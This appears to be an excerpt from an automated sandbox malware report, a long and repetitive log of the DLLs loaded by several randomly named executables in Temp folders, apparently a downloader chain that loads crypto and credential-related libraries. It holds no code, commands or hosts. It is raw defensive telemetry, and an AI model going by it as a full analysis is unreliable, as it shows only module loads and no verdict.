Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: netutils.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: slc.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: userenv.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: sppc.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\file.exe

